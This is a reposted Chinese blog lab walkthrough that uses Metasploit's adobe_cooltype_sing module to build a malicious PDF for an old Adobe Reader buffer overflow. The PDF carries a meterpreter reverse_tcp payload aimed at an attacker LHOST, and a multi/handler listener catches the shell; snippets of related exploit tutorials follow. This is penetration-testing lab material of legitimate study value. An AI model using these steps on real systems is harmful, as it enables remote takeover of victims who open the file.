Metasploits之Adobe阅读器漏洞

最新推荐文章于 2021-05-13 11:17:08 发布

weixin_30379911

最新推荐文章于 2021-05-13 11:17:08 发布

阅读量209

点赞数

文章标签：操作系统

原文链接：http://www.cnblogs.com/SzSec/p/7245357.html

版权

实验环境：Kali 2.0+Windows XP+Adobe Reader 9.3.0

类别：缓冲区溢出

描述：这个漏洞针对Adobe阅读器9.3.4之前的版本，一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

msfconsole    启动Metasploits
search cooltype_sing    搜索Adobe阅读器漏洞(adobe_cooltype_sing)相关模块 
use exploit/windows/fileformat/adobe_cooltype_sing    加载此模块

show options    查看所需的参数
show targets    查看受此漏洞影响的版本
show payloads    查看有效攻击载荷（就是攻击代码）

set payload windows/meterpreter/reverse_tcp    选定攻击载荷
show options 查看攻击载荷所需的参数
set LHOST 192.168.9.128    设置本机IP
exploit    生成pdf攻击文件

复制生成的PDF文件到XP系统
XP系统安装阅读器Adobe Reader 9.3.0

use exploit/multi/handler    加载监听模块
run    启动

转载于:https://www.cnblogs.com/SzSec/p/7245357.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30379911

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

metasploit漏洞扫描器.txt

03-18

metasploit漏洞扫描器.txt

Adobe阅读器渗透攻击

weixin_30561177的博客

04-11

156

Adobe阅读器渗透攻击和之前一样kali攻击机和winxp靶机要ping通（真心是通的..不再重复了）；由于之后生成的pdf在隐藏文件夹下，故在kali下打开显示隐藏文件，如下图： kali开启msfconsole； use exploit/windows/fileformat/adobe_cooltype_sing，进入该漏洞模块的使用。用命令set payload windows/...

参与评论您还未登录，请先登录后发表或查看评论

Adobe阅读器渗透攻击实战案例

Goallegoal的博客

05-02

554

Adobe阅读器渗透攻击实战案例低版本的adobe reader 9.0版本会出现溢出攻击。

Adobe Reader栈溢出漏洞(CVE-2010-2883)分析

鬼手的博客

06-08

2807

文章目录漏洞描述测试环境静态分析定位触发点分析漏洞成因动态调试获取SING表的入口地址溢出点精心挑选的返回地址JavaScript实现HeapSpray利用ROP链绕过DEP保护漏洞利用流程总结漏洞修复参考资料这个漏洞是《漏洞战争》里面的第一个漏洞，也是我分析的第一个漏洞。水平有限，如有错误还望各位大佬指正。漏洞描述 CVE-2010-2883是Adobe Reader和Acrobat中的Co...

Adobe阅读器漏洞(adobe_cooltype_sing)学习研究

weixin_30381793的博客

03-31

322

实验环境：Kali 2.0+Windows XP sp3+Adobe Reader 9.0.0 类别：缓冲区溢出描述：这个漏洞针对Adobe阅读器9.3.4之前的版本，一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。参考资料：《Metasploit魔鬼训练营》p286-p298 Adobe漏洞渗透过程： kali上使用windows/fileforma...

metasploit实验报告及漏洞利用代码

01-11

Metasploit是一款强大的安全渗透测试工具，主要用于模拟攻击和检测系统漏洞。它是开源社区的瑰宝，由 Rapid7 维护，并且在全球范围内被安全研究人员、渗透测试人员以及网络安全专业人员广泛使用。本实验报告将深入...

最新IE 0day漏洞Metasploit生成方法.txt

最新发布

03-18

最新IE 0day漏洞Metasploit生成方法.txt

metasploit中使用lnk漏洞渗透测试.doc

03-18

Metasploit 中使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架，广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞，通过exploit 可以获得目标机的shell 权限。本文将详细介绍...

( Metasploit漏洞利用基础教程

11-03

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序...

客户端渗透之——基于PDF文件格式的渗透攻击

冰河的专栏

01-24

2654

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86633022 攻击机 Kali 192.168.175.128 靶机 WinXP 192.168.175.130 漏洞程序： Adobe Reader 9.0 1.生成PDF文件 msfconsole use exploit/windows/fileformat/ad...

Kali学习 | 漏洞利用：4.10 PDF文件攻击

qq_43233085的博客

01-12

1851

Kali学习 | 漏洞利用：4.10 PDF文件攻击 PDF介绍操作步骤 PDF介绍 PDF是一种文件格式，该文件的使用比较广泛，并且容易传输。通常在工作中，用户都是从工作程序中打开了一个合法的PDF文档。当打开该文档时，该用户的主机就有可能被攻击。 Metasploit提供了一个渗透攻击模块，可以来创建一个攻击载荷，通过传递该攻击载荷对目标系统进行渗透攻击。操作步骤（1）启动MSFCON...

Adobe漏洞攻击

weixin_30802171的博客

04-16

Adobe漏洞攻击 windows ip 开启msfconsole 进入攻击模块设置攻击载荷payload 设置相关参数确定需要修改的参数 exploit生成5303.pdf 将pdf复制到靶机里设置参数攻击获得靶机的信息查看转载于:https://www.cnblogs.com/ljq007/p/6720876.html...

使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程

D-river博客

10-11

9752

metasploit比较经典的使用实例，ms08-067 netapi

利用Metasploit制作PDF木马

#7的博客

11-06

6664

实验环境：kali-linux虚拟机（攻击机）、win7虚拟机（靶机）实验工具：Vmware、kali-linux的iso 之前做了一个视频发现无法上传，此处就发一些过程截图吧。实验过程：一、攻击机端： 1.查看自己的ip地址：ifconfig 2.进入metasploit控制台：msfconsole 3.利用PDF文件漏洞（Adobe公司之前发布的一个漏洞）：use ...

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击

weixin_30412577的博客

04-12

139

20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击实验内容初步掌握平台matesploit的使用有了初步完成渗透操作的思路本次攻击对象为：windows xp sp3 / Adobe 9.3 主机为kali的ip地址为：192.168.199.220、靶机windows xp 的ip地址为：192.168.199.137 实验步骤使用命令msfconsole进入...

Metasploit生成免杀恶意程序

maoyeyedezhihui的博客

05-09

1474

1.注意事项以下渗透测试坏境需要windows xp sp3，之前用的sp2，程序执行时一直报错提示找不到kernel.dll，其实是sp2系统不支持，是系统自身的问题。 2.生成独立运行的二进制文件在演示免杀技术之前，先用MSF攻击载荷生成器(msfvenom)创建一个可独立运行的Metasploit载荷程序。在此，选择创建一个反弹shell程序，它能够回连到攻击机，并弹出一个命令行shel...

使用Metasploit生成PDF文件对目标进行渗透测试

渗透测试

05-13

1126

文章目录前言一、漏洞介绍二、渗透步骤1.生成恶意pdf文件2.启动主控端handler总结前言使用PDF文件对目标进行渗透测试一、漏洞介绍测试案例描述漏洞 Smart Independent Glyplets （SING）表中的uniquename存在着栈溢出漏洞影响到的版本 windows、macintosh和unix的Adobe Reader 9.3.4 / Acrobat 9.3.4及更早版本示例：pandas 是基于NumPy 的一种工具，该工具是为了解决

MSF MS11-050/10-087/Adobe攻击实践及内存保护技术

weixin_30883777的博客

08-05

306

MSF MS11-050/10-087/Adobe攻击实践及内存保护技术内存攻击指的是攻击者利用软件安全漏洞，构造恶意输入导致软件在处理输入数据时出现非预期错误，将输入数据写入内存中的某些特定敏感位置，从而劫持软件控制流，转而执行外部输入的指令代码，造成目标系统被获取远程控制或被拒绝服务。内存攻击表面原因是软件编写错误，注入过滤输入的条件设置缺陷、变量类型转换错误等，但根本原因是，现代电子计算机...

Metasploit插件开发：从漏洞到利用代码实践

在Metasploit框架中编写插件是渗透测试中的重要环节，它允许你扩展框架的功能，以适应特定的漏洞利用或自动化任务。以下是一些关于Metasploit插件开发和利用过程的关键知识点： 1. **Metasploit框架**：这是一个...